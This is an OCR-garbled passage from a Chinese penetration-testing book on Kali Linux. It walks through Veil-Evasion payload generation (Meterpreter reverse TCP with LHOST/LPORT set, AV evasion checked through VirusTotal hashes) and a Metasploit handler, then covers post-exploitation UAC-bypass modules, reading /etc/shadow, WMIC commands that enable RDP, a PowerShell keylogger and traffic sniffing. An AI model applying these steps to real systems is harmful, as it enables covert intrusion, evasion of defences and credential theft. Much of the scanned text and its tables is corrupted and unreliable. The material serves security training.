.UNC 调用。 


Veil-Evasion 可 从 Kali 库 中 使 用 ， 如 安装 Veil-Evasion， 在 提示 符 下 简单 地 输入 apt-get install veil-evasion 命 令 即 可 。 


— 如 果 你 收 到 任何 错误 ， 重 新 运行 : /usr/share/veil-evasion/setup/setup.shlWl. 


Veil-Evasion 为 用 户 呈 现 一 个 主 菜 单 ， 它 提供 几 个 负载 模块 ， 并 且 这 些 载 集 用 命令 的 万 式 使 用 。 命 令 list 将 列 出 所 有 可 用 的 


payloads， 命 令 list langs 将 列 出 有 效 载 傈 的 可 用 语言 ， 命 令 list<language> 将 列 出 特定 语言 的 有 效 载 集 表 。Veil-Evasion 开 始 


启动 的 初始 界面 如 图 4.19 所 示 。 
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Main Menu 
payloads loaded 


Available commands: 


use use a specific payload 

info information on a specific payload 
List List available payloads 

update update Veil to the Latest version 
clean clean out payload folders 

checkvt check payload hashes vs. VirusTotal 
exit exit Veil 


图 4.19 ”Veil-Evasion 开 始 启 动 的 初始 界面 


Veil-Evasion 正 在 快速 友 展 ， 几 乎 每 个 月 都 有 重大 的 友 布 ， 重 要 的 升级 更 加 频繁 地 友 生 。 目 前 ， 米 用 加 密 或 直接 注入 到 内 存 
空间 的 技术 ， 有 24 个 有 效 载 傈 能 绕 过 杀毒 软件 。 这 些 有 效 载 集 如 图 4.20 所 示 。 


要 获得 一 个 特定 的 负载 信息 ， 输 入 info < 载 傈 数字 /载荷 名 > ， 或 者 输入 info<tab> ， 自 动 填充 可 用 有 效 载 倚 的 信息 。 你 还 可 
以 输入 列表 中 的 数字 。 在 下 面 的 例子 中 ， 我 们 输入 19 选 择 python/shellcode inject/aes encryptzXts; ( 见 图 4.21) 。 
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1) c/meterpreter/rev tcp 

2) c/meterpreter/rev tcp service 

3) c/shellcode inject/virtual 

4) c/shellcode inject/void 

5) cs/meterpreter/rev tcp 

6) cs/shellcode inject/base64 substitution 

7) cs/shellcode inject/virtual 

8) native/Hyperion 

3) native/backdoor factory 

18) native/pe scrambler 

11) powershell/shellcode inject/download virtual 
12) powershell/shellcode inject/psexec virtual 
13) powershell/shellcode inject/virtual 

14) python/meterpreter/rev http 

15) python/meterpreter/rev http contained 

16) python/meterpreter/rev https 

17) python/meterpreter/rev_https_contained 

18) python/meterpreter/rev_tcp 

19) python/shellcode inject/aes encrypt 

20) python/shellcode inject/arc encrypt 

21) python/shellcode inject/base64 substitution 
22) python/shellcode inject/des encrypt 

23) python/shellcode inject/flat 

24) python/shellcode inject/letter substitution 


图 4.20 Veil-Evasion™ JF 8328 zi 345 


Payload: Loaded 


Name Current Value Description 

compile to exe Y Compile to an executable 

expire payload X Optional: Payloads expire after "X" days 
inject method Virtual Virtual, Void, Heap 

use pyherion N Use the pyherion encrypter 


Available commands: 


set set a specific option value 

info show information about the payload 
generate generate payload 

back go to the main menu 

exit exit Veil 


图 4.21 python/shellcode  inject/aes encryptZX 4 


利用 包括 expire_payload 选 项 。 如 果 模 块 不 能 被 目标 用 户 在 指定 的 时 间 内 运行 ， 衣 模块 不 能 操作 。 此 功能 有 助 于 攻击 的 隐 
HUE, 


所 需 的 选项 包括 选项 的 名 称 、 黑 认 值 和 搞 述 。 如 果 所 需 的 值 不 是 黑 认 值 ， 则 测试 人 员 需 在 有 效 载 倚 生成 前 输入 一 个 值 。 要 设 
置 一 个 选项 的 值 ， 输 入 set< 选 项 名 >， 然 后 输入 期 望 人 入。 如 果 要 接受 默认 选项 ， 并 创建 该 利用 时 ， 需 在 命令 提示 行 输入 生成 类 


如 果 载 傈 使 用 shellcode， 将 为 你 呈现 shellcode 荣 单 ， 你 可 以 选择 msfvenom (默认 shellcode) 或 目 定义 的 shellcode。 如 
果 自 定义 shellcode 选 项 已 经 选择 ， 以 \XO1\X02 的 形式 进入 shellcode， 不 能 有 引号 和 换行 符 (\n) 。 如 果 默 认 msfvenom 被 选 
中 ， 你 的 默认 载 丛 选择 提示 符 是 windows/meterpreter/reverse_tcp。 如 果 你 想 使 用 另 一 个 有 效 载 傈 ， 按 Tab 刍 来 完成 有 效 载 
傈 。 可 用 的 有 效 载 全 如 图 4.22 所 示 。 


[?] Use msfvenom or supply custom shellcode? 
l - msfvenom (default) 
2 - Custom 
[>] Please enter the number of your choice: 1 
[*] Press [enter] for windows/meterpreter/reverse tcp 
[*] Press [tab] to list available payloads 
[>] Please enter metasploit payload: windows/ 
windows ./adduser windows /patchupdllinject/ 
windows/dLLinject/ windows/patchupmeterpreter/ 
windows/dns txt query exec windows/sheLL/ 
windows/download exec windows/shell bind tcp 
windows /exec windows/shell bind tcp xpfw 
windows /Lloadlibrary windows/shell reverse tcp 
windows /messagebox windows/speak pwned 
windows/meterpreter/ windows/upexec/ 
windows/metsvc bind tcp windows/vncinject/ 


windows/metsvc reverse tcp 


windows/x64/ 


图 4.22 ARIT 


在 下 面 的 例子 中 ， 使 用 tab 命 令 来 展示 一 些 可 用 的 有 效 载 和 荷 ; 然而 ， 默 认 (windows/meterpreter/reverse tcp) 被 选 定 ， 
如 图 4.23 所 示 。 


[ ?] 


Use msfvenom or supply custom shellcode? 


1 - msfvenom (default) 
2 - Custom 


Please enter the number of your choice: 1 


Press [enter] for windows/meterpreter/reverse tcp 

Press [tab] to List available payloads 

Please enter metasploit payload: 

Enter value for 'LHOSI', [tab] for Local IP: 192.168.43.134 
Enter value for ‘LPORT': 4444 

Enter extra msfvenom options in OPTION=value syntax: 


然后 


图 4.23 ”使 用 tab 命 令 显 示 可 用 的 载荷 


， 用 户 将 看 到 输出 菜单 上 显示 一 个 提示 ， 在 这 里 选择 所 生成 的 负载 文件 的 基本 名 。 如 果 负 载 是 基于 Python 的 ， 并 且 你 


选择 了 compile to_exe 选 项 ， 用 户 使 可 以 使 用 pyinstaller 创 建 EXE 文 件 ， 或 者 直接 生成 Py2Exe 文 件 ， 如 图 4.24 所 示 。 


[*] Press [enter] for ‘payload’ 
[>] Please enter the base name for output files: update 


[7] How would you Like to create your payload executable? 


] - Pyinstaller (default) 
2 - Py2Exe 


[>] Please enter the number of your choice: 1 B 


图 4.24 选择 输出 文件 的 类 型 


已 经 生成 载 答 的 屏幕 最 后 显示 的 信息 ， 如 图 4.25 所 示 。 
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[*] Executable written to: 


Language: 
Payload: python/shellcode inject/aes encrypt 
Shellcode: windows/meterpreter/reverse tcp 
Üptions: LHOSI2192.168.43.134 LPORT=4444 
Required Options: compile to exe-Y expire payload-X 
inject method-Virtual use pyherion-N 
Payload File: / root/veil-output/source/updatel.py 
Handler File: / root/veil-output/handlers/updatel handler.rc 


[*] Your payload files have been generated, don t get caught! 
[!] And don't submit samples to any online scanner! ;) 


图 4.25 ”生成 载荷 后 显示 的 信息 
使 用 以 下 选项 还 可 以 直接 从 命令 行 创 建 该 利用 : 


kali@linux:~./Veil-Evasion.py -p python/shellcode inject/ 
aes encrypt -o -output --msfpayload windows/meterpreter/ 
reverse tcp --msfoptions LHOST=192.168.43.134 LPORT=4444 


一 旦 一 个 漏洞 利用 被 创建 ， 测 试 人 员 应 该 验证 载荷 对 抗 VirusTotal 的 能 力 ， 确 保 载荷 放 在 目标 系统 中 不 会 触发 警报 。 如 果 负 
载 样 品 被 直接 提交 到 VirusTotal， 并 且 它 的 行为 被 标记 为 恶意 软件 ， 那 么 ， 在 短 得 一 个 小 时 内 ， 反 病毒 供应 商 将 友 签 名 更 新 以 阻 
击 载 傈 。 这 丈 是 为 什么 用 尸 被 明确 警告 的 信息 “不 提交 样品 到 任何 在 线 扫描 !“ 


Veil-Evasion 人 允许 测试 人 员 使 用 安全 检查 对 抗 VirusTotal。 当 创建 了 任何 有 效 载 合 时 ， 将 创建 一 个 SHA1 散 列 ， 并 添加 到 


hashes.txt 文 件 ， 位 于 ~/veiloutput 目 录 。 测 试 人 员 可 以 调用 checkvt 脚 本 提交 散 列 值 到 VirusTotal， 并 检查 该 SHA1 散 列 值 与 
VirusTotal 的 恶意 软件 数据 库 。 如 果 一 个 Veil-Evasion 的 有 效 载 答 触 友 了 一 个 匹配 ， 那 么 测试 人 员 知 道 它 可 以 被 目标 系统 检测 


到 。 如 果 它 不 触发 匹配 ， 那 么 该 漏洞 利用 载 答 将 绕 过 反 病 毒 软件 。 一 个 使 用 checkvt 命 令 的 成 功 的 查找 (没有 被 AV 检 测 到 ) , ^ 
图 4.26 所 示 。 
Available commands: 


use use a specific payload 

info information on a specific payload 
list list available payloads 

update update Veil to the latest version 
clean clean out payload folders 

checkvt check payload hashes vs. ViruslotaL 
exit exit Veil 


[>] Please enter a command: checkvt 


[*] No payloads found on VirusTotal! 


4.26 检查 VirusTotal 中 的 载荷 


如 果 checkvt 不 能 在 VirusTotal 中 找到 匹配 ， 该 载 三 将 不 会 被 目标 的 杀毒 软件 检测 到 。 为 了 使 用 Metasploit 框 架 ， 使 用 


exploit/multi/jhandler， 并 且 设 置 PAYLOAD 为 windows/meterpreter/reverse tcp (与 Veil-Evasion 有 效 载 从 的 选项 相同 ) , 
也 如 Veil-Evasion 一 样 使 用 LHOST 和 LPORT。 当 监听 器 功能 正常 ， 发 送 利 用 到 目标 系统 。 当 监听 器 启动 时 ， 它 将 建立 一 个 逆向 
的 外 这， 返回 给 攻击 者 的 系统 。 


4.5 


问 。 


TE, 


标 。 


小 结 


在 本 章 中 ， 我 们 专注 于 漏洞 利用 作为 工具 ， 将 调查 结果 转换 为 一 个 已 定义 的 行动 ， 该 动作 将 建立 测试 人 员 和 目标 之 间 的 访 


Kali 提 供 了 一 些 工 具 来 方便 开发 、 选 择 和 激活 利用 ， 其 中 包括 内 部 开发 数据 库 以 及 几 个 框架 ， 简 化 了 漏洞 利用 的 使 用 与 管 
在 这 些 框 架 中 ，Metasploit 框 架 和 Armitage 尤 为 重要 ; 然而 ，Veil-Evasion 增 强 了 绕 过 杀毒 软件 、 检 测 软件 的 能 力 。 


接 下 来 的 两 章 重 点 介绍 攻击 者 杀 链 最 重要 的 部 分 一 一 后 期 利用 活动 。 这 是 攻击 的 一 部 分 ， 在 这 里 ， 攻 击 者 实现 他 们 的 目 
典型 的 后 期 利用 活动 包括 盗窃 和 港 露 数据 ( 专 有 信息 或 经 济 信 息 ) ， 模 同 扩 展 利用 访问 控制 ， 并 通过 盗窃 用 己任 所 来 纵 同 扩 


Self ”后 期 利用 一 一 行动 的 目的 


在 黑客 攻击 和 系统 攻击 的 现代 社会 中 ， 黑 客 并 不 关心 漏洞 ， 黑 客 关 心 的 是 通过 入 侵 他 们 可 以 做 些 什么 。 这 正 是 杀 链 (kill 
chain) 中 攻击 者 实现 其 攻击 全 部 价值 的 部 分 。 


一 个 系统 一 旦 锌 攻破 ， 攻 击 者 通常 进行 以 下 活动 : 

-进行 快速 评估 ， 确 定 本 地 环境 特征 〈 基 础 设备 、 连 通 性 、 账 户 、 存 在 的 目标 文件 ， 以 及 可 以 促进 攻击 的 应 用 程序 ) 。 
定位、 复制 ， 或 者 修改 感 兴趣 的 目标 文件 ， 例 如 数据 文件 〈 专 有 的 数据 和 财务 信息 ) 。 

创建 额外 的 账号 并 修改 系统 ， 以 支持 后 期 利用 活动 。 

:试图 通过 捕捉 系统 管理 员 或 系统 级 凭证 ， 来 垂直 升级 用 于 入 侵 的 特殊 权限 的 级 别 。 

尝试 通过 已 攻破 的 系统 来 攻击 网 路 中 的 剩余 的 数据 系统 〈 横 向 升级 ) 。 

-安放 持久 的 后 门 和 保持 控制 隐蔽 通道 ， 并 且 ， 与 已 攻破 的 系统 保持 安全 通信 〈 详 见 第 6 章 ) 。 

-消除 被 入 侵 系统 的 入 侵 标志 。 


为 了 入 侵 成 功 ， 后 渗透 攻击 要 求 对 目标 主机 的 操作 系统 和 文件 结构 有 全 面 的 了 解 ， 以 确保 可 以 绕 过 其 保护 权限 。 后 期 利用 的 
第 一 步 束 是 侦察 被 入 侵 系 统 的 本 地 网 络 状况 。 


在 本 章 中 ， 你 将 了 解 到 以 下 几 点 : 


:如何 绕 过 Windows 的 用 户 账 号 控制 (User Account Control, UAC) 。 
如何 对 入 侵 成 功 的 系统 进行 一 个 快速 的 侦察 。 

怎么 从 入 侵 的 系统 中 获得 敏感 数据 P) o 

:如何 创 建 另 外 的 账号 。 

如何 使 用 Metasploit 框 架 来 进行 后 期 利用 活动 。 

通过 纵向 和 横向 的 升级 技术 ， 来 提高 你 的 访问 权限 和 增加 被 入 侵 用 户 的 数量 。 
如何 使 用 反 取证 的 拉 术 来 掩 新 你 的 攻击 ， 以 防止 被 入 侵 系 统 发 现 。 


511 ” 绕 过 Windows 用 户 账户 控制 


在 Windows Vista 以 及 更 高 的 版 本 中 ， 微 软 引进 了 安全 控制 策略 ， 从 高 、 中 、 低 三 个 不 同 的 完整 性 级 别 上 来 控制 运行 进程 。 
一 个 高 等 级 别 的 进程 具有 管理 员 权 限 ， 一 个 中 等 级 别 的 进程 拥有 一 个 基本 用 户 的 权限 ， 一 个 低级 别 的 进程 的 权限 是 受 限 的， 这 样 
可 以 保证 当 系 统 受到 威胁 时 ， 被 击 垮 的 程序 市 来 的 损害 是 最 小 的 。 


要 执行 任何 特权 操作 ， 程 序 必须 以 管理 员 的 身份 运行 ， 并 且 符 合 UAC 的 设置 。 


UAC 有 以 下 4 个 设置 要 求 : 
始终 通知 (Always notify) : 这 是 最 严格 的 设置 ， 在 任何 时 刻 ， 有 程序 要 使 用 更 高 级 别 权限 时 ， 它 都 会 提示 本 地 用 户 。 


仅 人 在 程序 试图 更 改 我 的 计算 机 时 通知 我 (Notify me only when programs try to make changes to my computer) : 这 是 
UAC 的 默认 设置 。 当 本 地 的 Windows 程 序 请 求 更 高 级 别 权限 时 ， 不 通知 用 户 。 但 是 ， 如 果 第 三 方程 序 要 求 提 升 权 限 ， 它 会 提示 。 


-只 有 当 程 序 试图 更 改 我 的 计算 机 时 通知 我 (MERRIER) (Notify me only when programs try to make changes 
to my computer (don’t dim my desktop) ) : 这 与 默认 设置 相同 ， 但 当 提 示 用 户 时 不 降低 系统 监视 器 的 亮度 。 


-从 不 提示 (Never notify) : 此 选项 将 恢复 系统 到 Vista 以 前 的 版 本 。 如 果 该 用 户 是 管理 员 ， 所 有 的 程序 将 以 高 度 完 整 性 运行 。 


因此 ， 在 渗透 完成 乙 后 ， 测 试 者 (与 攻击 者 ) 需要 知道 以 下 两 件 事 : 


:哪个 用 户 是 系统 已 经 识别 的 用 户 ? 
-在 该 系统 中 ， 这 些 用 户 具 有 什么 权限 ? 


这 些 可 以 通过 下 面 这 个 命令 来 获得 : 
C:\> whoami /groups 


一 个 被 入 侵 的 系统 可 操作 的 内 容 是 非常 完整 的 ， 由 Mandatory Label\High Mandatory Level Label 展 示 的 内 容 如 图 5.1 所 


个 \。 


如 果 这 个 表 是 Mandatory Label\Medium Mandatory Level， 为 了 更 多 后 期 利用 步骤 的 成 功 ， 测 试 人 员 需 要 将 用 户 权 限 从 
标准 用 户 提 升 到 管理 员 权 限 。 


提升 权限 的 第 一 种 方法 是 使 用 Metasploit 框 架 ， 在 其 上 运行 exploit/windows/local/ask 命 令 ， 它 将 友 起 RunAs 攻 击 。 这 个 
攻击 可 以 创建 一 个 可 执行 文件 ， 当 它 被 触发 时 ， 会 运行 一 个 友 起 提升 权限 请 求 的 程序 。 为 了 避免 被 本 地 的 杀毒 软件 检测 到 ， 这 个 
可 执行 文件 的 创建 要 使 用 EXE: : Custom 选 项 或 Veil-Evasion 进 行 加 密 。 


C:\ewhoam /groups 


GROUP INFORMATION 


Group Name Type SIO Attributes 

Everyone well-known group S-1-1-0 Mandatory group 
dd_workstation1\ora_dba Alias $-1-5-21-1261573383- 3819712627-1454010182-1040 Mandatory group 
BUILTIN Administrators Alias 5-1-5-32-544 Mandatory group 
BUILTIN Users Alias $-1-5-32-545 Mandatory group 
NT AUTHORITYXINTERACTIVE well-known group $-1-5-4 Mandatory group 
CONSOLE LOGON well-known group $-1-2-1 Mandatory group 
NT AUTHORITY \Authenticated Users well-known group $-1-5-11 Mandatory group 
NT AUTHORITY\ This Organization well-known group $-1-5-15 Mandatory group| 
LOCAL well-known group 5-1-2-0 Mandatory group 
NT AUTHORITY\NTLM Authentication well-known group $-1-5-64-10 Mandatory group! 
MandINT AUTHORITY\NTLM Authentication well-known group S-1-5-64-10 [|o group 


Mandatory Label\High Mandatory Level Label 二 一 一 一 S-1-16-12288 


图 5.1 使 用 C:\>whoami/groups 获 得 信息 


RunAs 攻 击 的 缺点 是 ， 当 程序 企图 修改 计算 机 设置 时 ， 系 统 会 对 用 户 友 出 提醒 。 此 警报 可 能 会 导致 权限 提升 被 认定 为 攻击 。 


如 果 系 统 当 前 的 用 户 是 在 管理 员 组 ， 同 时 用 户 账户 控制 程序 UAC 设 置 为 默认 ， 即 仅 在 程序 试图 更 改 我 的 计算 机 时 通知 我 
(如 果 设 置 为 始终 通知 ， 束 可 以 避免 ) ， 攻 击 者 就 可 以 使 用 Metasploitexploit/windows/local/bypassuac 模 块 来 提升 其 特权 。 


虽然 bypassuac 模 块 会 在 目标 系统 上 创建 多 个 工件 ， 它 们 可 以 被 大 多 数 杀 毒 软件 识别 。 但 
是 ，exploit/windows/local/bypassuac_inject 模 块 直接 运行 在 内 存 中 的 反射 DLL 中 ， 由 于 它 不 触 磁 硬盘 ， 最 大 限度 地 降低 了 被 


杀毒 软件 检测 到 的 概率 。 


试图 绕 过 UAC 控 制 时 的 一 些 注意 事项 如 下 : 


"windows Vista 系 统 对 每 个 操作 都 需要 权限 控制 ， 那 么 经 过 用 户 账 户 控制 的 攻击 不 会 起 作用 。 


:虽然 Windows 8 系统 仍然 很 容易 受到 这 种 攻击 。 但 是 ， Metasploi tie Nri H 目前 还 没有 针对 Windows 8.1 的 模块 。 如 果 有 人 党 试 攻击 
Windows 8.1， 一 个 隐蔽 攻击 的 困难 是 提升 用 户 的 权限 ， 即 在 攻击 发 生前 用 户 会 被 提示 点 击 \ 确 定 “ 按 钮 。 攻 击 者 可 以 选择 使 用 
exploit/windows/local/ask 提 高 攻击 的 成 功率 。 


考虑 系统 系统 的 移动 (水 平 / 横 同 升级 ) ， 同 时 ， 如 果 当 前 用 户 是 共有 其 他 系统 本 地 管理 员 权 限 的 域 用 户 ， 可 以 使 用 现 有 有 的 里 份 验证 令 脾 来 
获取 并 绕 过 UAC。 一 种 常见 的 攻击 是 使 用 Metasploit 的 exploit/windows/local/current user psexec 模 块 实现 。 


5.2 ”对 已 入 侵 的 系统 进行 快速 侦察 


一 旦 系统 被 入 侵 , 攻 击 者 需要 获得 有 关 该 系统 的 关键 信息 ， 它 的 网 络 环境 、 用 尸 和 用 户 账 号 等 信息 。 通 弟 情 况 下 ， 他 们 将 在 
shell 提 示 符 下 输入 并 调用 一 系列 命令 或 脚本 。 


如 果 被 入 侵 的 系统 是 基于 UNIX 平 台 的 ， 典 型 的 本 地 侦察 命令 见 表 5.1。 
表 5.1 _ UNIX 平台 的 本 地 侦察 命 


节令 Ha ik 

使 用 copy 命令 来 访问 和 查看 系统 当前 的 DNS 设置 。 因 为 它 是 具有 读 
取 权 了 良 的 全 局 文件 的 权限， 不 会 触发 报 壮 

这 些 是 包含 用 尸 儿 和 密码 破 列 的 系统 文件 。 拥 有 root 级 别 的 用 户 可 以 
Ew. FH] LEHTE, "n John the Ripper 


/etc/resolv.cont 


‘etc/passwd 和 /etc/shadow 


whoami 和 who —a fife — “PAS He SAY FHP 

提 民 网络 信 息 。ifeconfie -a 提供 下 地 址 的 详情 ，iptables-L-a 列 出 dió Hh, 
ifconfig -a, iptables -L -n 和 netstat —r 7 j for i i a Mn j a XR : e 

Dj; Ades AY Pp a an] (WRS by Aha), netstat-r 显示 由 内 核 维护 的 路 由 信息 
uname —a 输出 内 is hs d 
ps aux frd “SHI fTHJHR ST. ERE S AUDA e E 
dpkg -1 vum list | grepinstalled 和 dpke -1 
EM FM EE 确定 所 安装 的 软件 包 


rpm-qa --last | head 
这 些 命令 包含 了 可 用 选项 的 简要 说明 。 完 整 信息 请 参考 相应 的 命令 的 帮助 文件 ， 在 哪里 可 以 了 解 如 何 使 用 命令 的 选项 


对 于 Windows 系 统 ， 命 令 形式 如 表 5.2 所 示 。 


表 5.2 Windows 系 统 下 的 侦察 命令 


shine fim 
Hn 立 


whoami /all 
ipconfig /all 和 ipconfig /displaydns 
列 出 相关 进 各 


netstat -bnao Hl netstat —r s 
ID (-o). 


net view «KI net view /domain 


tB EX 
列 出 PAE | 


net user /domain 


net user “ousername™o / domain Hh. 


脚本 和 组 成 员 


输出 本 地 系统 的 密码 策略 


net accounts 


策略 
net localgroup administrators 1] ED? 
net group "Domain Controllers" / 


domain 


显示 当前 的 共享 


net share 


列 出 当前 用 户 、SID 安全 标识 符 
显示 有 关 网 络 接口 信息 、 
的 端口 和 连接 
选项 可 以 显示 路 由 表 信 息 
ft if 7 NBNS/ SMB 和 定位 


管理 员 的 本 地 组 的 成 员 . 


witk, OE, 


HI rv [BT RIT ig H P z 


| 


(-b), AFZET (-n)， 所 有 连接 ( -a)， 父 进程 
这 些 都 需要 以 管理 员 权 


和 或 域 中 的 上 所 有 主机 .， 


Wi 77 


到 当前 工作 对 于 -由 /domain 给 


所 有 的 域 都 是 有 效 的 
SLA Ara HIP 
获得 关于 当前 用 户 的 信息 ， 
/domain 则 是 不 必要 有 的 ， 


最 后 一 次 千代 aH] 登录 


如 果 它 们 是 查询 域 的 一 部 分 { 
EEA adii]. 


^. 


FAX BOR BET "m fl 5 


fE FH net accounts /domain 来 获得 


IH] /domain HJH, 31S up LJ E 3 


TTEN ia US e s p e WY Pe 


可 能 不 能 对 


计件 夹 中 的 共用 数据 和 它们 所 


者 回 的 路 径 提 供 足 够 的 访问 控制 权限 


使 用 WMIC 的 脚本 语言 


针对 新 的 目标 系统 ， 攻 击 者 和 渗 3 


Management Instrumentation Command-line, WMIC) 


参透 系统 文 持 WMIC， 可 以 通过 一 些 命 令 来 收集 信息 。 请 参见 


透 测试 人 员 利 用 内 置 的 脚本 语言 。 例 如 ，Windows 设 备 管 理 命 令 行 (Windows 
通过 使 用 命令 行 和 脚本 界面 来 简化 访问 Windows 配 置 。 如 果 被 
见 表 5.3。 


表 5.3 支持 WMIC 的 信息 收集 命令 


命令 
wimicnicconfig get ipaddress.macaddress 
winic computersystem get username 
winicnetlogin get name, lastlogon 
winic desktop get screensaversecure, screensavertimeout 
winic logon get authenticationpackage 
winic process get caption, executablepath, commandline 
wmmic process where name-"process name" call terminate 
wmlic os get name, servicepackmajorversion 


winic product get name, version 


wmic product where name-"name' call uninstall / 


nointeractive 
wimic share get /ALL 
mic/node:"machinename" path Win32 
TerminalServiceSetting where 
AllowTSConnections="0" 


call SetAllowTSConnections"1" 


winicnteventlog get path, filename, writeable 


狄 得 下 地址 和 MAC 地址 
验证 被 攻破 的 账户 

硝 定 是 谁 最 后 一 次 使 用 该 系统 ， 
确定 屏幕 保护 程序 是 否 有 密码 保护 和 什 
硝 定 文 持 哪些 登录 方法 


y) er “登录 的 时 间 
么 时 候 超 时 


| niet 
dn — 


确定 系统 的 操作 系统 
标识 已 安装 的 软件 


iE EE ae HH E: AE X Hyg ^ d i 包 


Pi HA Pi a SE 


远程 局 动 | RDP 


找到 所 有 的 系统 事件 日 记 ， 
Thi Ee dr n nii.) JESTIN Hey {ae j H) 


并 确保 它们 可 以 被 修改 (在 


PowerShell 是 一 种 基于 .NET 框 架 的 脚本 语言 ， 从 控制 台 上 运行 ， 提 供用 户 访 问 Windows 文 件 系 统 和 对 象 的 接口 ， 例 如 注册 
表 。Windows 7 及 更 高 的 操作 系统 上 默认 安装 PowerShell。WMIC 为 PowerShell 提 供 了 扩展 脚本 支持 和 自动 化 ， 允 许 Shell 用 户 
对 本 地 和 远程 目标 进行 集成 和 互 操 作 。 


PowerShelli 上 测试 人 员 访 问 被 击 垮 系统 上 的 shell 和 脚本 语言 。 作 为 Windows 操 作 系 统 的 自 带 程序 ， 其 使 用 的 命令 不 会 触发 
杀毒 软件 。 当 脚本 在 远程 系统 上 运行 时 ， 由 于 PowerShell 不 会 写 入 磁盘 ， 因 而 可 以 绕 过 反 病 毒 软件 和 和 白 名 单 过 滤 (假设 用 户 已 
经 允许 使 用 PowerShell) 。 


PowerShell 支 持 一 些 被 称 为 cmdlets 的 内 置 肖 数 。PowerShell 的 优点 之 一 是 由 于 cmdlets 是 常见 的 UNIX 命 令 的 别名 ， 所 以 
在 键入 ls 命令 将 返回 一 个 典型 的 目录 列表 ， 如 图 5.2 所 示 。 


PowerShell 是 一 种 支持 复杂 操作 的 脚本 语言 ， 建 议 用 户 花 时 间 来 熟悉 它 的 使 用 。 一 些 较 简单 的 、 可 以 立即 展示 结果 的 命令 
见 表 5.4。 
C=: \>powers hell 


Windows Powershell 
Copyright 《ny 2612 Microsoft Corporation. All] rights reserved. 


PS CN? Is 


Directory: GC: 


Mode LastWriteTime Length Name 

A 15/89/2013 7:39 PM config 

d--—- 29/11/2013 1:12 PM HarddiskVo lumeShadowCopys 
一 1170972012 11:53 AM Log 

时 一 二 一 3070872013 3:37 PM metasploit 


图 5.2 使 用 ls 命令 的 屏幕 截图 
表 5.4 简单 的 PowerShell 命 令 表 


节令 描述 
Get-Host | Select Version | 标识 受害 者 系统 中 所 使 用 的 PowerShell 的 版 本 ,一 些小 命令 在 不 同 的 版 本 中 增加 或 调用 
Get-Hotfix 标识 已 安装 的 安全 补丁 和 系统 修补 程序 
Get-Acl 慰 识 组 名 和 用 尸 镍 
Get-Process, Get-Service | 列 出 当前 的 进程 和 服务 
gwmi win32 useraccount | 调用 WMI J| ih HP IEP 
Gwmi win32 group UH WMI 列 出 SID 、 名 称 和 域 组 


渗透 测试 人 员 可 以 使 用 Windows 自 带 的 命令 文件 、DLL、.NET 函 数 、WMI1 调 用 和 Powershell 的 cmdlets 命 令 一 起 创建 后 缀 
名 为 .ps1 的 PowerShell 脚 本 。 


号 在 最 近 的 渗透 测试 中 ， 我 们 花 止 在 客户 端的 系统 中 安 闭 任何 可 执行 的 软件 。 我 们 在 被 感染 的 系统 上 ， 使 用 PowerShe11 键 租 记 录 工 具 来 抓 
去 管理 员 级 别 的 证 书 ， 然 后 感染 网 络 上 的 更 多 的 系统 。 最 有 效 的 渗透 和 后 期 渗透 脚本 ， 包 括 键 盘 记 录 ， 它 是 Niknhil Mittal’s Nishang 包 
的 一 部 分 Chttps://code.google.com/p/nishang/downloads/detailname=nishang 0.3.0.zip) 。 


侦察 也 应 该 扩展 到 本 地 网 络 。 既 然 你 正在 “盲目 ”地 工作 ， 你 将 需要 创建 一 个 与 被 击 垮 主机 通信 的 地 图 ， 被 击 垮 主机 包括 实 
时 系统 和 子 网 。 首 先 在 shell 提 示 符 下 输入 IFCONFIG (基于 UNIX 的 系统 ) 或 PCONFIG/ALL (Windows 系 统 ) 。 这 将 允许 一 个 
攻击 者 确定 以 下 内 容 : 


.DHCP 地 址 是 否 有 效 。 


-本 地 IP 地 址 ， 这 将 确定 至 少 有 一 个 活跃 子 网 。 


:网关 的 IP 地 址 和 服务 嚣 地址。 系统 管理 员 通 常 遵 循 网 络 中 的 编号 惯例 ， 并 且 ， 如 果 攻 击 者 知道 一 个 地 址 ， 例 如 ， 一 个 网 关 服 务 器 的 地 址 
172.16.21.5， 他 们 将 用 ping 找 地 址 ， 如 172.16.20.5、172.16.22.5 等 ， 通 过 这 些 地 址 寻找 到 其 他 子 网 。 


能 过 域名 利用 活动 目录 (Active Directory) 账号 。 


如 果 攻 击 系统 和 目标 系统 使 用 的 是 Windows 操 作 系 统 ，net view 命 令 可 以 用 来 枚 举 网 络 上 的 其 他 Windows 操 作 系 统 。 攻 击 
者 使 用 netstat-rn 命 令 来 审查 那些 包含 通 往 其 他 网 络 ， 或 者 感 兴趣 系统 的 静态 路 由 的 路 由 表 。 


可 以 使 用 nmap 来 扫 摘 本 地 网 络 咖 探 出 ARP 广 播 。 另 外 ，Kail 有 几 个 工具 可 以 用 作 SNMP 端 点 分 析 工 具 ， 包 括 : nmap, 


onesixtyon 和 snmpcheck。 


部 署 一 个 数据 包 嗅 探 器 来 映射 流量 将 会 帮助 你 识别 主机 名 、 活 跃 子 网 和 域名 。 如 果 DHCP 地 址 没有 启用， 它 也 将 允许 攻击 者 
确定 任何 未 使 用 的 、 静 态 的 IP 地 址 。Kail 预 先 配置 使 用 Wireshark (基于 GUI 的 数据 包 嗅 探 器 ) ， 但 是 你 可 以 在 一 个 后 期 利用 脚 
本 中 ， 或 者 在 命令 行使 用 tshark， 如 图 5.3 所 示 。 


rod -~# tshark -i 1 -VV -w traffic out 
Running as user "root" and group "root". This could be dangerous. 
Capturing on ethO 
Frame 1: 84 bytes on wire (6/2 bits], 84 bytes captured (5/2 bits) on interface 
{=} 
Interface id: 0 
WTAP ENCAP: 1 


Arrival Time: Sep 13, 2013 03:32:34.524557600 EDT 
[Time shift for this packet: 0.0000008000 seconds] 
Epoch Time: 13/905/554.52455/000 seconds 
[Time delta from previous captured frame: 0.000000000 seconds] 
[Time delta from previous displayed frame: 06.000000000 seconds] 
[Time since reference or first frame: 0.000000000 seconds] 
Frame Number: 1 
Frame Length: 84 bytes (5/2 bits] 
Capture Length: 84 bytes (5/2 bits) 

| 


t 
[Frame is marked: Fals: 
[Frame is ignored: False e] 
[Protocols in frame: eth:ipv6:udp:dns] 


图 5.3 ”使 用 tshank 命 令 


5.3 ”找到 并 提取 敏感 数据 一 一 拟 拖 目标 


Mains (pillaging， 有 时 也 称 为 pilfering) 是 黑客 成 功 攻击 计算 机 系统 后 的 延续 ， 这 些 黑客 像 海 次 一 样 尽 最 大 可 能 偷窃 和 
